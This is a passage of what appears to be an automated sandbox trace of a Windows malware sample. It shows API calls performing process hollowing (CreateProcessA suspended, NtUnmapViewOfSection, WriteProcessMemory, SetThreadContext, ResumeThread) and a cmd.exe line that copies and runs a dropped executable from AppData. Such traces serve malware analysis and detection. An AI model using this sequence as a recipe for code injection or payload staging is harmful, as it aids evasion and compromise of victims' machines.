nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.185] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.336] VirtualProtect (in: lpAddress=0x2134d0, dwSize=0x564a0, flNewProtect=0x40, lpflOldProtect=0x12fe48 | out: lpflOldProtect=0x12fe48*=0x4) returned 1 [0112.337] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0112.337] LoadLibraryA (lpLibFileName="user32") returned 0x76b40000 [0112.337] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxA") returned 0x76b9ea11 [0112.337] LoadLibraryA (lpLibFileName="kernel32") returned 0x76910000 [0112.337] GetProcAddress (hModule=0x76910000, lpProcName="WinExec") returned 0x7699e5fd [0112.337] GetProcAddress (hModule=0x76910000, lpProcName="CreateFileA") returned 0x7695cee8 [0112.338] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0112.338] GetProcAddress (hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0112.338] GetProcAddress (hModule=0x76910000, lpProcName="CreateProcessA") returned 0x76912082 [0112.338] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadContext") returned 0x76970cc1 [0112.338] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAlloc") returned 0x76962fb6 [0112.338] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAllocEx") returned 0x7694c1b6 [0112.338] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0112.338] GetProcAddress (hModule=0x76910000, lpProcName="ReadProcessMemory") returned 0x7694c1ce [0112.338] GetProcAddress (hModule=0x76910000, lpProcName="WriteProcessMemory") returned 0x7694c1de [0112.338] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadContext") returned 0x769a0193 [0112.338] GetProcAddress (hModule=0x76910000, lpProcName="ResumeThread") returned 0x76950f1c [0112.338] GetProcAddress 
(hModule=0x76910000, lpProcName="WaitForSingleObject") returned 0x7695ba90 [0112.338] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameA") returned 0x769633f6 [0112.338] GetProcAddress (hModule=0x76910000, lpProcName="GetCommandLineA") returned 0x769698ff [0112.338] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77230000 [0112.338] GetProcAddress (hModule=0x77230000, lpProcName="NtUnmapViewOfSection") returned 0x772769b8 [0112.338] GetProcAddress (hModule=0x76b40000, lpProcName="RegisterClassExA") returned 0x76b46293 [0112.338] GetProcAddress (hModule=0x76b40000, lpProcName="CreateWindowExA") returned 0x76b4bf40 [0112.338] GetProcAddress (hModule=0x76b40000, lpProcName="PostMessageA") returned 0x76b4b446 [0112.338] GetProcAddress (hModule=0x76b40000, lpProcName="GetMessageA") returned 0x76b51899 [0112.338] GetProcAddress (hModule=0x76b40000, lpProcName="DefWindowProcA") returned 0x76b4bb1c [0112.338] RegisterClassExA (param_1=0x12fbc0) returned 0xc13d [0112.342] CreateWindowExA (dwExStyle=0x200, lpClassName="bxVV7cGHPHusOnmHbFKqGnzKMpomaw", lpWindowName="ptodEzQlWskupc762Nhc3wjD8apfHQ", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=1000, nHeight=1000, hWndParent=0x0, hMenu=0x0, hInstance=0x0, lpParam=0x0) returned 0xf013c [0112.396] PostMessageA (hWnd=0xf013c, Msg=0x400, wParam=0x64, lParam=0x1f4) returned 1 [0112.396] GetMessageA (in: lpMsg=0x12fbf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x12fbf0) returned 1 [0112.396] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x1000, flProtect=0x4) returned 0x1c0000 [0112.396] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1c0000, nSize=0x2800 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\bkm66byk.exe")) returned 0x30 [0112.396] GetCommandLineA () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" 
\"7l6OWDI9Fmrsoy1O\" \"340_LESS_1GB\" \"60000\"" [0112.396] CreateProcessA (in: lpApplicationName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe", lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"340_LESS_1GB\" \"60000\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12faf0*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb48 | out: lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"340_LESS_1GB\" \"60000\"", lpProcessInformation=0x12fb48*(hProcess=0x4c, hThread=0x48, dwProcessId=0xd80, dwThreadId=0xd84)) returned 1 [0112.398] VirtualFree (lpAddress=0x1c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0112.399] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x1000, flProtect=0x4) returned 0x1c0000 [0112.399] GetThreadContext (in: hThread=0x48, lpContext=0x1c0000 | out: lpContext=0x1c0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, 
[34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffd8000, Edx=0x0, Ecx=0x0, Eax=0x402581, Ebp=0x0, Eip=0x77277098, SegCs=0x1b, EFlags=0x200, Esp=0x12fff0, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, 
[128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, 
[309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, 
[490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0112.517] ReadProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x7ffd8008, lpBuffer=0x12fb3c, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12fb3c*, lpNumberOfBytesRead=0x0) returned 1 [0112.517] NtUnmapViewOfSection (ProcessHandle=0x4c, BaseAddress=0x400000) returned 0x0 [0112.517] VirtualAllocEx (hProcess=0x4c, lpAddress=0x400000, dwSize=0x11d000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0112.517] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x400000, lpBuffer=0x214770*, nSize=0x1000, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x214770*, lpNumberOfBytesWritten=0x0) returned 1 [0112.517] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x401000, lpBuffer=0x214b70, nSize=0x0, lpNumberOfBytesWritten=0x0 | out: lpNumberOfBytesWritten=0x0) returned 0 [0112.517] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x4c7000, lpBuffer=0x214b70*, nSize=0x54600, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x214b70*, lpNumberOfBytesWritten=0x0) returned 1 [0112.524] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x51c000, lpBuffer=0x269170*, nSize=0x800, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x269170*, lpNumberOfBytesWritten=0x0) returned 1 [0112.524] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x7ffd8008, lpBuffer=0x2148a4*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2148a4*, lpNumberOfBytesWritten=0x0) returned 1 [0112.524] SetThreadContext (hThread=0x48, lpContext=0x1c0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, 
FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffd8000, Edx=0x0, Ecx=0x0, Eax=0x51b2d0, Ebp=0x0, Eip=0x77277098, SegCs=0x1b, EFlags=0x200, Esp=0x12fff0, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, 
[95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, 
[277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, 
[458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0112.524] ResumeThread (hThread=0x48) returned 0x1 [0112.524] CloseHandle (hObject=0x48) returned 1 [0112.524] CloseHandle (hObject=0x4c) returned 1 [0112.524] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.525] GetModuleHandleW (lpModuleName="mscoree.dll") returned 0x0 [0112.525] ExitProcess (uExitCode=0x0) Process: id = "42" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16660" os_pid = "0xd68" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FIXLNKVIEW\" \"60000\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], 